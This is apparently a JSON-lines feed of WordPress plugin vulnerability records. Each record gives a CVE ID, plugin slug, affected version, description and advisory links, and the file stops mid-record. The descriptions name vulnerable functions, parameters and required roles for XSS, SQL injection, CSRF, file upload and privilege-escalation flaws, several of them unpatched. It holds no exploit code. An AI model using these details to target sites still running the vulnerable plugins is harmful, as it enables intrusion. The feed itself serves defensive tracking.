{"CVE_ID":"CVE-2024-9116","slug":"monkee-boy-wp-essentials","versionImpact":"1.1","description":"The Monkee-Boy Essentials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c44c1a50-e282-4a5b-8b7f-1021c9d6f58e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c44c1a50-e282-4a5b-8b7f-1021c9d6f58e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/monkee-boy-wp-essentials\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/monkee-boy-wp-essentials\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11012","slug":"notibar","versionImpact":"2.1.4","description":"The Notibar \u2013 Notification Bar for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via njt_nofi_text AJAX action in all versions up to, and including, 2.1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notibar\\\/trunk\\\/includes\\\/NotificationBar\\\/WpCustomNotification.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notibar\\\/trunk\\\/includes\\\/NotificationBar\\\/WpCustomNotification.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205224\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205224\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notibar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notibar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1766727d-ba54-4b46-b362-415c14be027d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1766727d-ba54-4b46-b362-415c14be027d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12541","slug":"chative-live-chat-and-chatbot","versionImpact":"1.1","description":"The Chative Live chat and Chatbot plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the add_chative_widget_action() function. This makes it possible for unauthenticated attackers to change the channel ID or organization ID via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This could lead to redirecting the live chat widget to an attacker-controlled channel.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chative-live-chat-and-chatbot\\\/trunk\\\/chative-plugin.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chative-live-chat-and-chatbot\\\/trunk\\\/chative-plugin.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chative-live-chat-and-chatbot\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chative-live-chat-and-chatbot\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61d3cb97-f12b-4480-88fc-2bdcbf4cdae3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61d3cb97-f12b-4480-88fc-2bdcbf4cdae3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13347","slug":"essential-wp-real-estate","versionImpact":"1.1.3","description":"The Essential WP Real Estate WordPress plugin through 1.1.3 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2f97636-4c67-409a-83c6-ad6255aa2cc5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2f97636-4c67-409a-83c6-ad6255aa2cc5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11335","slug":"ultraembed-advanced-iframe","versionImpact":"1.0.3","description":"The UltraEmbed \u2013 Advanced Iframe Plugin For WordPress with Gutenberg Block Included plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'iframe' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultraembed-advanced-iframe\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultraembed-advanced-iframe\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bfaff5c-25b0-470a-b1ef-fce5976ce205?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bfaff5c-25b0-470a-b1ef-fce5976ce205?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1911","slug":"product-import-export-for-woo","versionImpact":"2.5.0","description":"The Product Import Export for WooCommerce \u2013 Import Export Product CSV Suite plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the admin_log_page() function in all versions up to, and including, 2.5.0. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary log files on the server.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d222ef6d-cdec-482e-92ba-65eeabbcdeae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d222ef6d-cdec-482e-92ba-65eeabbcdeae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3280","slug":"elex-bulk-edit-products-prices-attributes-for-woocommerce-basic","versionImpact":"1.4.9","description":"The ELEX WooCommerce Advanced Bulk Edit Products, Prices & Attributes plugin for WordPress is vulnerable to SQL Injection via the 'attribute_value_filter' parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elex-bulk-edit-products-prices-attributes-for-woocommerce-basic\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elex-bulk-edit-products-prices-attributes-for-woocommerce-basic\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2e4b83a-34d5-4a8a-b694-a887a46fe6bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2e4b83a-34d5-4a8a-b694-a887a46fe6bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4420","slug":"vayu-blocks","versionImpact":"1.3.1","description":"The Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018containerWidth\u2019 parameter in all versions up to, and including, 1.3.1 due to a missing capability check on the vayu_blocks_option_panel_callback() function and insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/admin-api.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/admin-api.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303594\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303594\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vayu-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vayu-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db01bc0a-4508-4fb5-941d-3f1a52528e2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db01bc0a-4508-4fb5-941d-3f1a52528e2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6256","slug":"flex-guten","versionImpact":"1.2.5","description":"The Flex Guten plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018thumbnailHoverEffect\u2019 parameter in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flex-guten\\\/trunk\\\/build\\\/blocks\\\/dwp-latest-posts\\\/render.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flex-guten\\\/trunk\\\/build\\\/blocks\\\/dwp-latest-posts\\\/render.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flex-guten\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flex-guten\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca149cc0-b256-41cd-b64d-dd905bd72602?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca149cc0-b256-41cd-b64d-dd905bd72602?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1922","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_pause_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1743b26-861e-4a61-80de-b8cc82308228?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1743b26-861e-4a61-80de-b8cc82308228?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5704","slug":"cpo-shortcodes","versionImpact":"1.5.0","description":"The CPO Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8ba38c3-51d2-43a7-89ff-c72a8edc946b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8ba38c3-51d2-43a7-89ff-c72a8edc946b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cpo-shortcodes\\\/trunk\\\/shortcodes\\\/shortcode-testimonial.php?rev=2413204#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cpo-shortcodes\\\/trunk\\\/shortcodes\\\/shortcode-testimonial.php?rev=2413204#L38\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5957","slug":"ni-purchase-orderpo-for-woocommerce","versionImpact":"1.2.1","description":"The Ni Purchase Order(PO) For WooCommerce WordPress plugin through 1.2.1 does not validate logo and signature image files uploaded in the settings, allowing high privileged user to upload arbitrary files to the web server, triggering an RCE vulnerability by uploading a web shell.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/70f823ff-64ad-4f05-9eb3-b69b3b79dc12\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/70f823ff-64ad-4f05-9eb3-b69b3b79dc12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1473","slug":"colorlib-coming-soon-maintenance","versionImpact":"1.0.99","description":"The Coming Soon & Maintenance Mode by Colorlib plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.99 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page contents via REST API thus bypassing maintenance mode protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48dc10a9-7bb9-401f-befd-1bf620858825?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48dc10a9-7bb9-401f-befd-1bf620858825?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/colorlib-coming-soon-maintenance\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/colorlib-coming-soon-maintenance\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5790","slug":"happy-elementor-addons","versionImpact":"3.11.1","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 attribute within the plugin's Gradient Heading widget in all versions up to, and including, 3.11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1b948a-7a7e-4bdf-af1d-559f34d4baa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1b948a-7a7e-4bdf-af1d-559f34d4baa3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.11.0\\\/widgets\\\/gradient-heading\\\/widget.php#L260\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.11.0\\\/widgets\\\/gradient-heading\\\/widget.php#L260\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108597\\\/#file575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108597\\\/#file575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7827","slug":"wp-easycart","versionImpact":"5.7.2","description":"The Shopping Cart & eCommerce Store plugin for WordPress is vulnerable to boolean-based SQL Injection via the \u2018model_number\u2019 parameter in all versions up to, and including, 5.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa55dfe1-7ee8-4d25-a9f6-cbefeebb1376?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa55dfe1-7ee8-4d25-a9f6-cbefeebb1376?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easycart\\\/trunk\\\/wpeasycart.php#L8821\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easycart\\\/trunk\\\/wpeasycart.php#L8821\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easycart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easycart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136347\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136347\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9065","slug":"wp-helper-lite","versionImpact":"4.6.1","description":"The WP Helper Premium plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'whp_smtp_send_mail_test' function in all versions up to, and including, 4.6.1. This makes it possible for unauthenticated attackers to send emails containing any content and originating from the vulnerable WordPress instance to any recipient.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f3c6d98-6f30-4a98-91c9-e77c1f960527?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f3c6d98-6f30-4a98-91c9-e77c1f960527?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-helper-lite\\\/trunk\\\/functions\\\/class.wps-frontend-setup-function.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-helper-lite\\\/trunk\\\/functions\\\/class.wps-frontend-setup-function.php#L55\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10357","slug":"cafe-lite","versionImpact":"2.2.1","description":"The Clever Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.1 via the getTemplateContent function in src\/widgets\/class-clever-widget-base.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1fa3569-9a9a-4aa6-9057-c87601fadb9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1fa3569-9a9a-4aa6-9057-c87601fadb9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-widget-base.php#L411\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-widget-base.php#L411\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10783","slug":"mainwp-child","versionImpact":"5.2","description":"The MainWP Child \u2013 Securely Connects to the MainWP Dashboard to Manage Multiple Sites plugin for WordPress is vulnerable to privilege escalation due to missing authorization checks on the register_site function in all versions up to, and including, 5.2 when a site is left in an unconfigured state. This makes it possible for unauthenticated attackers to log in as an administrator on instances where MainWP Child is not yet connected to the MainWP Dashboard. IMPORTANT: this only affects sites that have MainWP Child installed and have not yet connected to the MainWP Dashboard, and do not have the unique security ID feature enabled. Sites already connected to the MainWP Dashboard plugin and do not have the unique security ID feature enabled, are NOT affected and not required to upgrade. Please note 5.2.1 contains a partial patch, though we consider 5.3 to be the complete patch.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-child.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-child.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-connect.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-connect.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-connect.php#L788\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mainwp-child\\\/tags\\\/5.2\\\/class\\\/class-mainwp-connect.php#L788\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197586%40mainwp-child&new=3197586%40mainwp-child&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197586%40mainwp-child&new=3197586%40mainwp-child&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mainwp-child\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mainwp-child\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9156e536-a58e-4d78-b136-af8a9613ee23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9156e536-a58e-4d78-b136-af8a9613ee23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12540","slug":"ldd-directory-lite","versionImpact":"3.3","description":"The LDD Directory Lite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldd-directory-lite\\\/trunk\\\/templates\\\/frontend\\\/edit-submit.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldd-directory-lite\\\/trunk\\\/templates\\\/frontend\\\/edit-submit.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldd-directory-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ldd-directory-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7675e1c-7194-4cfe-81fb-a78d75e0bb1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7675e1c-7194-4cfe-81fb-a78d75e0bb1e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13426","slug":"wp-polls","versionImpact":"2.77.2","description":"The WP-Polls plugin for WordPress is vulnerable to SQL Injection via COOKIE in all versions up to, and including, 2.77.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries. Those queries are stored and results are not displayed to the attacker, which means they cannot be exploited to obtain any additional information about the database. However, a properly configured payload allows for the injection of malicious JavaScript resulting in Stored Cross-Site Scripting.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/polls-logs.php#L294\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/polls-logs.php#L294\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/polls-logs.php#L97\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/polls-logs.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/wp-polls.php#L1378\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/wp-polls.php#L1378\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/wp-polls.php#L1416\",\"name\":\"https:\\\/\\\/github.com\\\/lesterchan\\\/wp-polls\\\/blob\\\/97ab44c2d4c3a3d308ce8b87dae8b2a8f7147f0e\\\/wp-polls.php#L1416\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPress\\\/wordpress-develop\\\/blob\\\/a82874058f58575dbba64ce09b6dcbd43ccf5fdc\\\/src\\\/wp-includes\\\/default-constants.php#L249\",\"name\":\"https:\\\/\\\/github.com\\\/WordPress\\\/wordpress-develop\\\/blob\\\/a82874058f58575dbba64ce09b6dcbd43ccf5fdc\\\/src\\\/wp-includes\\\/default-constants.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3224709%40wp-polls%2Ftrunk&old=2949758%40wp-polls%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_ema